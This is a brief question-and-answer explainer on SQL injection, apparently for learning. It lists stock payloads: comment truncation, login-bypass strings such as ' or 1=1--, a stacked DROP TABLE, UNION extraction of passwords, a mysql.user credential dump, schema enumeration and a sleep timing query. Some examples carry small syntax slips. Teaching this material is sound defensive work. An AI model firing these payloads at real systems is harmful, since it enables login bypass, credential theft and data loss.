Question: What is an SQL Injection Cheat Sheet?
An SQL injection cheat sheet is a resource in which you can find
detailed technical information about the many different variants of the SQL Injection vulnerability.
Question: Give few example SQL Injection Cheat Sheet?
#1 - Add comment in between Query which leads to comments out rest of the query.
Normal Query
SELECT * FROM members WHERE email = 'adminuser' AND password = 'password';
tempered Query
SELECT * FROM members WHERE email = 'adminuser'-- AND password = 'password';
(In this query will check for username only)
#2 Add comment between some part of query
SELECT id,/* comment here*/ email FROM members WHERE 1
#3 SQL Injection Attack deleting table
SELECT id email FROM members WHERE email="arun@example.com" ; drop table users
#4 Union Injections - try to get another table data
SELECT id email FROM members WHERE email="arun@example.com" union select email,password from members
#5 Bypassing Login Screens - Un-Authentication login with modify in sql through injection
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
#6 Get All mysql users with password
SELECT User,Password FROM mysql.user;
#7 Get MySQL version
SELECT @@version
#8 Get all MySQL tables
SELECT * FROM information_schema.tables
#9 Sleep Query
SELECT 10,sleep(100)
SELECT 10,sleep(100)
